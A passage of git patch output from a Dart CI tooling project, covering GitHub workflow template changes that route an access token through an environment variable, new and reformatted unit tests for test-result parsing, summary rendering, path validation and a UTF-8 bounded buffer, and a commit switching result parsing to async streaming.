url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -488,13 +491,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform / multi_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform / multi_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -557,12 +561,14 @@ jobs: <%/web_test_has_paths%> - name: Upload web test artifacts on failure - if: failure() && hashFiles('**/test-results/**') != '' + if: failure() uses: actions/upload-artifact@v4 with: name: web-test-artifacts path: | **/test-results/ + ${{ runner.temp }}/test-results/ + if-no-files-found: ignore retention-days: <%artifact_retention_days%> <%/web_test%> diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart index 79047f6..9727e86 100644 --- a/test/cli_utils_test.dart +++ b/test/cli_utils_test.dart @@ -9,6 +9,7 @@ import 'package:runtime_ci_tooling/src/cli/utils/repo_utils.dart'; import 'package:runtime_ci_tooling/src/cli/utils/step_summary.dart'; import 'package:runtime_ci_tooling/src/cli/utils/sub_package_utils.dart'; import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/utf8_bounded_buffer.dart'; bool _canCreateSymlink() { final tempDir = Directory.systemTemp.createTempSync('symlink_probe_'); @@ -46,10 +47,7 @@ void main() { }); test('returns default path when TEST_LOG_DIR is unset', () { - final resolved = RepoUtils.resolveTestLogDir( - repoRoot, - environment: const {}, - ); + final resolved = RepoUtils.resolveTestLogDir(repoRoot, environment: const {}); expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); }); @@ -73,10 +71,8 @@ void main() { test('throws when TEST_LOG_DIR is relative', () { expect( - () => RepoUtils.resolveTestLogDir( - repoRoot, - environment: const {'TEST_LOG_DIR': 'relative/path'}, - ), + () => + RepoUtils.resolveTestLogDir(repoRoot, environment: const {'TEST_LOG_DIR': 'relative/path'}), throwsA(isA()), ); }); @@ -85,10 +81,7 @@ void main() { final runnerTemp = p.join(repoRoot, 'runner-temp'); final outside = p.join(repoRoot, 'outside', 'logs'); expect( - () => RepoUtils.resolveTestLogDir( - repoRoot, - environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, - ), + () => RepoUtils.resolveTestLogDir(repoRoot, environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}), throwsA(isA()), ); }); @@ -102,6 +95,17 @@ void main() { ); expect(resolved, equals(inside)); }); + + test('throws when RUNNER_TEMP contains control characters', () { + final inside = p.join(repoRoot, 'runner-temp', 'logs'); + expect( + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': '/tmp/runner\nbad', 'TEST_LOG_DIR': inside}, + ), + throwsA(isA()), + ); + }); }); group('RepoUtils filesystem safety', () { @@ -137,35 +141,19 @@ void main() { expect(File(filePath).readAsStringSync(), equals('hello world')); }); - test( - 'ensureSafeDirectory rejects symlink-backed directories', - skip: !symlinksSupported, - () { - final targetDir = Directory(p.join(tempDir.path, 'target')) - ..createSync(recursive: true); - final linkDirPath = p.join(tempDir.path, 'linked'); - Link(linkDirPath).createSync(targetDir.path); - expect( - () => RepoUtils.ensureSafeDirectory(linkDirPath), - throwsA(isA()), - ); - }, - ); - - test( - 'writeFileSafely rejects symlink file targets', - skip: !symlinksSupported, - () { - final targetFile = File(p.join(tempDir.path, 'target.txt')) - ..writeAsStringSync('base'); - final linkPath = p.join(tempDir.path, 'linked.txt'); - Link(linkPath).createSync(targetFile.path); - expect( - () => RepoUtils.writeFileSafely(linkPath, 'new content'), - throwsA(isA()), - ); - }, - ); + test('ensureSafeDirectory rejects symlink-backed directories', skip: !symlinksSupported, () { + final targetDir = Directory(p.join(tempDir.path, 'target'))..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect(() => RepoUtils.ensureSafeDirectory(linkDirPath), throwsA(isA())); + }); + + test('writeFileSafely rejects symlink file targets', skip: !symlinksSupported, () { + final targetFile = File(p.join(tempDir.path, 'target.txt'))..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect(() => RepoUtils.writeFileSafely(linkPath, 'new content'), throwsA(isA())); + }); }); group('TestResultsUtil.parseTestResultsJson', () { @@ -213,21 +201,16 @@ void main() { expect(results.failures, isEmpty); }); - test( - 'returns unparsed results when file has valid JSON but no structured events', - () { - final jsonPath = p.join(tempDir.path, 'no_events.json'); - File( - jsonPath, - ).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }, - ); + test('returns unparsed results when file has valid JSON but no structured events', () { + final jsonPath = p.join(tempDir.path, 'no_events.json'); + File(jsonPath).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }); test('parses pass/fail/skipped counts and failure details', () { final jsonPath = p.join(tempDir.path, 'results.json'); @@ -276,6 +259,24 @@ void main() { expect(results.failures.length, lessThanOrEqualTo(50)); }); + test('counts testDone with result \"error\" as a failure', () { + final jsonPath = p.join(tempDir.path, 'error_result.json'); + File(jsonPath).writeAsStringSync( + [ + '{"type":"testStart","test":{"id":1,"name":"errored"},"time":100}', + '{"type":"error","testID":1,"error":"boom","stackTrace":"trace"}', + '{"type":"testDone","testID":1,"result":"error","hidden":false,"skipped":false,"time":140}', + '{"type":"done","time":140}', + ].join('\n'), + ); + + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.failed, equals(1)); + expect(results.failures, hasLength(1)); + expect(results.failures.first.name, equals('errored')); + }); + test('ignores malformed JSON lines and hidden test entries', () { final jsonPath = p.join(tempDir.path, 'results.json'); File(jsonPath).writeAsStringSync( @@ -339,12 +340,7 @@ void main() { }); group('TestResultsUtil.writeTestJobSummary', () { - TestResults _parsed({ - required int passed, - required int failed, - required int skipped, - int durationMs = 500, - }) { + TestResults _parsed({required int passed, required int failed, required int skipped, int durationMs = 500}) { final results = TestResults() ..parsed = true ..passed = passed @@ -354,50 +350,39 @@ void main() { return results; } - test( - 'emits NOTE when parsed results are successful and exit code is 0', - () { - String? summary; - final results = _parsed(passed: 3, failed: 0, skipped: 1); - - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'linux-x64', - writeSummary: (markdown) => summary = markdown, - ); + test('emits NOTE when parsed results are successful and exit code is 0', () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux-x64')); - expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('All 4 tests passed')); - }, - ); - - test( - 'emits CAUTION when exit code is non-zero even if failed count is zero', - () { - String? summary; - final results = _parsed(passed: 2, failed: 0, skipped: 0); - - TestResultsUtil.writeTestJobSummary( - results, - 1, - platformId: 'linux ', - writeSummary: (markdown) => summary = markdown, - ); + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux <x64>')); - expect(summary!, contains('> [!CAUTION]')); - expect( - summary!, - contains( - 'Tests exited with code 1 despite no structured test failures.', - ), - ); - }, - ); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }); + + test('emits CAUTION when exit code is non-zero even if failed count is zero', () { + String? summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect(summary!, contains('Tests exited with code 1 despite no structured test failures.')); + }); test('emits CAUTION for unparsed results with non-zero exit code', () { String? summary; @@ -412,12 +397,7 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!CAUTION]')); - expect( - summary!, - contains( - 'Tests failed (exit code 7) — no structured results available.', - ), - ); + expect(summary!, contains('Tests failed (exit code 7) — no structured results available.')); }); test('emits NOTE for unparsed results with zero exit code', () { @@ -433,25 +413,14 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!NOTE]')); - expect( - summary!, - contains( - 'Tests passed (exit code 0) — no structured results available.', - ), - ); + expect(summary!, contains('Tests passed (exit code 0) — no structured results available.')); }); test('emits CAUTION when parsed results contain failures', () { String? summary; final results = _parsed(passed: 1, failed: 1, skipped: 0); results.failures.add( - TestFailure( - name: 'failing test', - error: 'boom', - stackTrace: 'trace', - printOutput: '', - durationMs: 12, - ), + TestFailure(name: 'failing test', error: 'boom', stackTrace: 'trace', printOutput: '', durationMs: 12), ); TestResultsUtil.writeTestJobSummary( @@ -491,16 +460,11 @@ void main() { ); expect(summary, isNotNull); - expect( - summary!, - contains( - '_...and 5 more failures. See test logs artifact for full details._', - ), - ); + expect(summary!, contains('_...and 5 more failures. See test logs artifact for full details._')); expect(summary!, isNot(contains('failing test 24'))); }); - test('escapes unsafe HTML in failure content (closing tags, etc.)', () { + test('keeps failure content readable inside fenced blocks', () { String? summary; final results = _parsed(passed: 0, failed: 1, skipped: 0); results.failures.add( @@ -521,10 +485,9 @@ void main() { ); expect(summary, isNotNull); - expect(summary!, contains('</details>')); - expect(summary!, contains('<script>')); - expect(summary!, contains('<summary>')); - expect(summary!, isNot(contains(''))); + expect(summary!, contains('```')); + expect(summary!, contains('Error: ')); + expect(summary!, contains('fake')); }); test('handles adversarial backtick content in failure output', () { @@ -533,7 +496,7 @@ void main() { results.failures.add( TestFailure( name: 'backtick test', - error: '```' * 10 + 'content' + '```' * 10, + error: '`' * 140 + 'content' + '`' * 140, stackTrace: '', printOutput: '', durationMs: 0, @@ -551,7 +514,34 @@ void main() { expect(summary!, contains('### Failed Tests')); expect(summary!, contains('backtick test')); // Fence should be longer than content's backticks; output should be valid - expect(summary!.split('```').length, greaterThan(2)); + expect(summary!.contains('`' * 141), isTrue); + }); + }); + + group('Utf8BoundedBuffer', () { + test('appends full content when under byte limit', () { + final buffer = Utf8BoundedBuffer(maxBytes: 20, truncationSuffix: '...[truncated]'); + buffer.append('hello'); + buffer.append(' world'); + expect(buffer.isTruncated, isFalse); + expect(buffer.toString(), equals('hello world')); + expect(buffer.byteLength, equals(11)); + }); + + test('truncates at UTF-8 rune boundaries and appends suffix', () { + final buffer = Utf8BoundedBuffer(maxBytes: 10, truncationSuffix: '...'); + buffer.append('aaaaaa'); + buffer.append('語語語'); // each 語 is 3 bytes + expect(buffer.isTruncated, isTrue); + expect(buffer.toString(), equals('aaaaaa...')); + expect(buffer.byteLength, equals(9)); + }); + + test('never exceeds maxBytes even when suffix is longer than remaining budget', () { + final buffer = Utf8BoundedBuffer(maxBytes: 4, truncationSuffix: '...[truncated]'); + buffer.append('abcdefgh'); + expect(buffer.isTruncated, isTrue); + expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); }); }); @@ -569,10 +559,7 @@ void main() { File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); - StepSummary.write( - '語', - environment: {'GITHUB_STEP_SUMMARY': summaryPath}, - ); + StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); // Should skip append (would exceed); file size unchanged expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); } finally { @@ -608,9 +595,7 @@ void main() { void _writeConfig(Map ci) { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync(json.encode({'ci': ci})); + File('${configDir.path}/config.json').writeAsStringSync(json.encode({'ci': ci})); } test('returns empty when no sub_packages', () { @@ -700,51 +685,35 @@ void main() { }); group('CiProcessRunner.exec', () { - test('fatal path exits with process exit code after flushing stdout/stderr', - () async { - final scriptPath = p.join( - p.current, - 'test', - 'scripts', - 'fatal_exit_probe.dart', - ); - final result = Process.runSync( - Platform.resolvedExecutable, - ['run', scriptPath], - runInShell: false, - ); + test('fatal path exits with process exit code after flushing stdout/stderr', () async { + final scriptPath = p.join(p.current, 'test', 'scripts', 'fatal_exit_probe.dart'); + final result = Process.runSync(Platform.resolvedExecutable, ['run', scriptPath], runInShell: false); final expectedCode = Platform.isWindows ? 7 : 1; - expect(result.exitCode, equals(expectedCode), - reason: 'fatal exec should exit with failing command exit code'); + expect(result.exitCode, equals(expectedCode), reason: 'fatal exec should exit with failing command exit code'); }); }); group('CiProcessRunner.runWithTimeout', () { test('completes normally when process finishes within timeout', () async { - final result = await CiProcessRunner.runWithTimeout( - Platform.resolvedExecutable, - ['--version'], - timeout: const Duration(seconds: 10), - ); + final result = await CiProcessRunner.runWithTimeout(Platform.resolvedExecutable, [ + '--version', + ], timeout: const Duration(seconds: 10)); expect(result.exitCode, equals(0)); expect(result.stdout, contains('Dart')); }); - test( - 'returns timeout result and kills process when timeout exceeded', - () async { - final executable = Platform.isWindows ? 'ping' : 'sleep'; - final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; - final result = await CiProcessRunner.runWithTimeout( - executable, - args, - timeout: const Duration(milliseconds: 500), - timeoutExitCode: 124, - timeoutMessage: 'Timed out', - ); - expect(result.exitCode, equals(124)); - expect(result.stderr, equals('Timed out')); - }, - ); + test('returns timeout result and kills process when timeout exceeded', () async { + final executable = Platform.isWindows ? 'ping' : 'sleep'; + final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; + final result = await CiProcessRunner.runWithTimeout( + executable, + args, + timeout: const Duration(milliseconds: 500), + timeoutExitCode: 124, + timeoutMessage: 'Timed out', + ); + expect(result.exitCode, equals(124)); + expect(result.stderr, equals('Timed out')); + }); }); } diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index a18f086..f91f04c 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -336,6 +336,11 @@ void main() { expect(errors, anyElement(contains('digits only'))); }); + test('string line_length empty string produces error', () { + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '')); + expect(errors, anyElement(contains('must not be empty'))); + }); + test('string line_length "+120" produces error (digits only, no sign)', () { final errors = WorkflowGenerator.validate(_validConfig(lineLength: '+120')); expect(errors, anyElement(contains('digits only'))); @@ -377,6 +382,33 @@ void main() { }); }); + // ---- artifact_retention_days ---- + group('artifact_retention_days', () { + test('int artifact_retention_days passes', () { + final config = _validConfig()..['artifact_retention_days'] = 14; + final errors = WorkflowGenerator.validate(config); + expect(errors.where((e) => e.contains('artifact_retention_days')), isEmpty); + }); + + test('string artifact_retention_days passes', () { + final config = _validConfig()..['artifact_retention_days'] = '30'; + final errors = WorkflowGenerator.validate(config); + expect(errors.where((e) => e.contains('artifact_retention_days')), isEmpty); + }); + + test('artifact_retention_days empty string produces error', () { + final config = _validConfig()..['artifact_retention_days'] = ''; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('artifact_retention_days string must not be empty'))); + }); + + test('artifact_retention_days above 90 produces error', () { + final config = _validConfig()..['artifact_retention_days'] = 91; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('between 1 and 90'))); + }); + }); + // ---- sub_packages (Issue #9 validation) ---- group('sub_packages', () { test('non-list sub_packages produces error', () { @@ -545,6 +577,17 @@ void main() { expect(errors, anyElement(contains('whitespace'))); }); + test('sub_packages name with leading/trailing whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': ' foo ', 'path': 'packages/foo'}, + ], + ), + ); + expect(errors, anyElement(contains('name must not have leading/trailing whitespace'))); + }); + test('sub_packages path with trailing tab triggers whitespace error', () { // Trailing \t means trimmed != value, so the whitespace check fires first. final errors = WorkflowGenerator.validate( @@ -1537,6 +1580,24 @@ void main() { expect(rendered, contains(specialContent)); }); + test('duplicate user section markers in existing content: last matched section wins', () { + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); + final base = gen.render(); + final existing = + ''' +$base +# --- BEGIN USER: pre-test --- + - run: echo first +# --- END USER: pre-test --- +# --- BEGIN USER: pre-test --- + - run: echo second +# --- END USER: pre-test --- +'''; + final rendered = gen.render(existingContent: existing); + expect(rendered, contains('echo second')); + expect(rendered, isNot(contains('echo first'))); + }); + test('null existingContent produces same output as no existingContent', () { final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final withoutExisting = gen.render(); @@ -1568,6 +1629,23 @@ void main() { expect(needs, contains('auto-format')); }); + test('format_check renders repo-wide dart format command (.)', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'format_check': true}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('run: dart format --line-length 120 .')); + }); + + test('git-config steps use env indirection (GH_PAT) instead of inline secrets in run', () { + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); + final rendered = gen.render(); + expect(rendered, contains('GH_PAT: \${{ secrets.')); + expect(rendered, contains('echo "::add-mask::\${GH_PAT}"')); + expect(rendered, isNot(contains('TOKEN="\${{ secrets.'))); + }); + test('web_test without format_check: web-test needs omits auto-format', () { final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: true), toolingVersion: '0.0.0-test'); final rendered = gen.render(); @@ -1631,6 +1709,21 @@ void main() { expect(needs, contains('analyze-and-test')); }); + test('single-platform uses explicit PLATFORM_ID from single_platform_id context', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}, platforms: ['windows-x64']), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final job = parsed['jobs']['analyze-and-test'] as YamlMap; + final steps = (job['steps'] as YamlList).toList(); + final testStep = steps.firstWhere((s) => s is YamlMap && s['name'] == 'Test', orElse: () => null); + expect(testStep, isNotNull); + final env = (testStep as YamlMap)['env'] as YamlMap; + expect(env['PLATFORM_ID'], equals('windows-x64')); + }); + test('secrets render in web-test job env block', () { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig(webTest: true)..['secrets'] = {'API_KEY': 'MY_SECRET'}, @@ -1762,6 +1855,15 @@ void main() { expect(rendered, contains('Policy: test artifact retention-days = 7')); }); + test('artifact retention-days can be overridden via ci.artifact_retention_days', () { + final ci = _minimalValidConfig(featureOverrides: {'managed_test': true}); + ci['artifact_retention_days'] = 14; + final gen = WorkflowGenerator(ciConfig: ci, toolingVersion: '0.0.0-test'); + final rendered = gen.render(); + expect(rendered, contains('retention-days: 14')); + expect(rendered, contains('Policy: test artifact retention-days = 14')); + }); + test('Windows pub-cache path uses format for Dart default (%LOCALAPPDATA%\\Pub\\Cache)', () { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig(platforms: ['windows']), From 5a98b33d78e71ddbe3a2414428e5d6f14a2f7671 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 22:22:11 -0500 Subject: [PATCH 14/16] fix: stream test result parsing and harden test command exits Switch test-results parsing to async line-by-line streaming to avoid loading large NDJSON files into memory. Add injectable exit handling and timeout controls in TestCommand so failure paths are testable, and expand tests/docs to cover the async parser contract. --- docs/cli/API_REFERENCE.md | 2 +- lib/src/cli/commands/test_command.dart | 25 +- lib/src/cli/utils/test_results_util.dart | 183 ++++++------ test/cli_utils_test.dart | 352 +++++++++++++++-------- test/test_command_test.dart | 218 ++++++++++---- 5 files changed, 511 insertions(+), 269 deletions(-) diff --git a/docs/cli/API_REFERENCE.md b/docs/cli/API_REFERENCE.md index 8b463b3..a008acf 100644 --- a/docs/cli/API_REFERENCE.md +++ b/docs/cli/API_REFERENCE.md @@ -292,7 +292,7 @@ if (isGitInstalled) { - Parsed aggregate test results. - Fields: `passed`, `failed`, `skipped`, `totalDurationMs`, `failures`, `parsed`. - **TestResultsUtil** - - `parseTestResultsJson(String jsonPath)`: `static TestResults` + - `parseTestResultsJson(String jsonPath)`: `static Future` - `writeTestJobSummary(TestResults results, int exitCode, {String? platformId, void Function(String markdown)? writeSummary})`: `static void` - **Utf8BoundedBuffer** - `Utf8BoundedBuffer({required int maxBytes, required String truncationSuffix})` diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 00df5c1..ccd198c 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -14,6 +14,8 @@ import '../utils/test_results_util.dart'; import '../utils/sub_package_utils.dart'; import '../utils/utf8_bounded_buffer.dart'; +typedef _ExitHandler = Future Function(int code); + /// Run `dart test` on the root package and all configured sub-packages with /// full output capture (two-layer strategy). /// @@ -49,14 +51,18 @@ class TestCommand extends Command { /// Run tests with an explicit [repoRoot], preserving the contract from /// manage_cicd when invoked as `manage_cicd test` (CWD may differ from root). - static Future runWithRoot(String repoRoot) async { + static Future runWithRoot( + String repoRoot, { + Duration processTimeout = const Duration(minutes: 45), + Duration pubGetTimeout = const Duration(minutes: 5), + _ExitHandler exitHandler = exitWithCode, + }) async { Logger.header('Running dart test'); - const processTimeout = Duration(minutes: 45); final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = await _resolveLogDirOrExit(repoRoot); + final logDir = await _resolveLogDirOrExit(repoRoot, exitHandler); Logger.info('Log directory: $logDir'); final jsonPath = p.join(logDir, 'results.json'); @@ -141,7 +147,7 @@ class TestCommand extends Command { } // Parse the JSON results file for structured test data - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); // Generate and write the rich job summary TestResultsUtil.writeTestJobSummary(results, exitCode); @@ -186,7 +192,6 @@ class TestCommand extends Command { // Ensure dependencies are resolved (sub-packages have independent // pubspec.yaml files that the root `dart pub get` may not cover). // Use Process.start so we can kill on timeout (Process.run would hang). - const pubGetTimeout = Duration(minutes: 5); final pubGetResult = await _runPubGetWithTimeout( dir, pubGetTimeout, @@ -278,7 +283,7 @@ class TestCommand extends Command { Logger.warn('Could not write sub-package log files: $e'); } - final spResults = TestResultsUtil.parseTestResultsJson(spJsonPath); + final spResults = await TestResultsUtil.parseTestResultsJson(spJsonPath); TestResultsUtil.writeTestJobSummary(spResults, spExitCode, platformId: name); if (spExitCode != 0) { @@ -293,7 +298,7 @@ class TestCommand extends Command { Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); final failureBullets = failures.map((name) => '- `${StepSummary.escapeHtml(name)}`').join('\n'); StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); - await exitWithCode(1); + await exitHandler(1); } Logger.success('All tests passed'); @@ -375,17 +380,17 @@ class TestCommand extends Command { return -1; } - static Future _resolveLogDirOrExit(String repoRoot) async { + static Future _resolveLogDirOrExit(String repoRoot, _ExitHandler exitHandler) async { try { final logDir = RepoUtils.resolveTestLogDir(repoRoot); RepoUtils.ensureSafeDirectory(logDir); return logDir; } on StateError catch (e) { Logger.error('$e'); - await exitWithCode(1); + await exitHandler(1); } on FileSystemException catch (e) { Logger.error('Cannot use log directory: $e'); - await exitWithCode(1); + await exitHandler(1); } } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart index 3b91503..63ae36f 100644 --- a/lib/src/cli/utils/test_results_util.dart +++ b/lib/src/cli/utils/test_results_util.dart @@ -39,7 +39,10 @@ const int _maxStoredPrintChars = 6000; /// Test-results parsing and step-summary writing for CI. abstract final class TestResultsUtil { /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. - static TestResults parseTestResultsJson(String jsonPath) { + /// + /// Uses streaming line-by-line parsing to avoid loading very large result + /// files fully into memory. + static Future parseTestResultsJson(String jsonPath) async { final results = TestResults(); final file = File(jsonPath); if (!file.existsSync()) { @@ -56,95 +59,101 @@ abstract final class TestResultsUtil { const _maxMalformedWarnings = 5; var malformedCount = 0; - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - results.parsed = true; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - if (hidden) break; - - results.parsed = true; - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - if (results.failures.length < 50) { - final startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - final rawError = testErrors[id]?.toString() ?? ''; - final rawStack = testStackTraces[id]?.toString() ?? ''; - final rawPrint = testPrints[id]?.toString() ?? ''; - results.failures.add( - TestFailure( - name: testNames[id] ?? 'unknown', - error: rawError.length > _maxStoredErrorChars - ? '${rawError.substring(0, _maxStoredErrorChars)}\n... (truncated)' - : rawError, - stackTrace: rawStack.length > _maxStoredStackTraceChars - ? '${rawStack.substring(0, _maxStoredStackTraceChars)}\n... (truncated)' - : rawStack, - printOutput: rawPrint.length > _maxStoredPrintChars - ? '${rawPrint.substring(0, _maxStoredPrintChars)}\n... (truncated)' - : rawPrint, - durationMs: endTime - startTime, - ), - ); + try { + final lines = file.openRead().transform(const Utf8Decoder(allowMalformed: true)).transform(const LineSplitter()); + + await for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + results.parsed = true; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + if (hidden) break; + + results.parsed = true; + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + if (results.failures.length < 50) { + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + final rawError = testErrors[id]?.toString() ?? ''; + final rawStack = testStackTraces[id]?.toString() ?? ''; + final rawPrint = testPrints[id]?.toString() ?? ''; + results.failures.add( + TestFailure( + name: testNames[id] ?? 'unknown', + error: rawError.length > _maxStoredErrorChars + ? '${rawError.substring(0, _maxStoredErrorChars)}\n... (truncated)' + : rawError, + stackTrace: rawStack.length > _maxStoredStackTraceChars + ? '${rawStack.substring(0, _maxStoredStackTraceChars)}\n... (truncated)' + : rawStack, + printOutput: rawPrint.length > _maxStoredPrintChars + ? '${rawPrint.substring(0, _maxStoredPrintChars)}\n... (truncated)' + : rawPrint, + durationMs: endTime - startTime, + ), + ); + } } - } - - case 'error': - results.parsed = true; - final id = event['testID'] as int?; - if (id == null) break; - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - results.parsed = true; - final id = event['testID'] as int?; - if (id == null) break; - final message = 